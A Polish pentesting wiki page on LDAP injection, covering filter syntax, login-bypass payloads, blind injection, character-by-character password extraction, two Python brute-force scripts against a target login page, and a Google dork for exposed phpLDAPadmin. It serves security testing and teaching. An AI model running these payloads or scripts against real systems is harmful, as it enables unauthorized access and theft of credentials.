LDAP Injection

Reading time: 6 minutes

LDAP Injection

LDAP Injection

LDAP

Jeśli chcesz wiedzieć, czym jest LDAP, odwiedź następującą stronę:

{{#ref}} ../network-services-pentesting/pentesting-ldap.md {{#endref}}

LDAP Injection to atak skierowany na aplikacje webowe, które konstruują instrukcje LDAP na podstawie danych wejściowych od użytkownika. Występuje, gdy aplikacja nieprawidłowo oczyszcza dane wejściowe, co pozwala atakującym na manipulację instrukcjami LDAP przez lokalny proxy, co może prowadzić do nieautoryzowanego dostępu lub manipulacji danymi.

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE

Na przykład:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))

Możesz uzyskać dostęp do bazy danych, która może zawierać informacje różnych typów.

OpenLDAP: Jeśli przyjdą 2 filtry, wykonuje tylko pierwszy.
ADAM lub Microsoft LDS: Przy 2 filtrach zgłaszają błąd.
SunOne Directory Server 5.0: Wykonuje oba filtry.

Bardzo ważne jest, aby wysłać filtr z poprawną składnią, w przeciwnym razie zostanie zgłoszony błąd. Lepiej wysłać tylko 1 filtr.

Filtr musi zaczynać się od: & lub |
Przykład: (&(directory=val1)(folder=public))

(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void

Następnie: (&(objectClass=*)(ObjectClass=*)) będzie pierwszym filtrem (tym, który zostanie wykonany).

Login Bypass

LDAP obsługuje kilka formatów do przechowywania hasła: clear, md5, smd5, sh1, sha, crypt. Tak więc, niezależnie od tego, co wprowadzisz w haśle, może być haszowane.

user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi

user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))

user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))

user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed

user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error

username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.

username=*
password=*)(&
--> (&(user=*)(password=*)(&))

username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))

Listy

• LDAP_FUZZ
• Atrybuty LDAP
• Atrybuty PosixAccount LDAP

Ślepa Iniekcja LDAP

Możesz wymusić odpowiedzi False lub True, aby sprawdzić, czy jakiekolwiek dane są zwracane i potwierdzić możliwą Ślepą Iniekcję LDAP:

#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))

#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))

Zrzut danych

Możesz iterować po literach ASCII, cyfrach i symbolach:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...

Skrypty

Odkryj ważne pola LDAP

Obiekty LDAP domyślnie zawierają kilka atrybutów, które mogą być używane do zapisywania informacji. Możesz spróbować przeprowadzić brute-force na wszystkich z nich, aby wydobyć te informacje. Możesz znaleźć listę domyślnych atrybutów LDAP tutaj.

#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()

Specjalna Ślepa Iniekcja LDAP (bez "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break

Google Dorks

intitle:"phpLDAPadmin" inurl:cmd.php

Więcej ładunków

{{#ref}} https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection {{#endref}}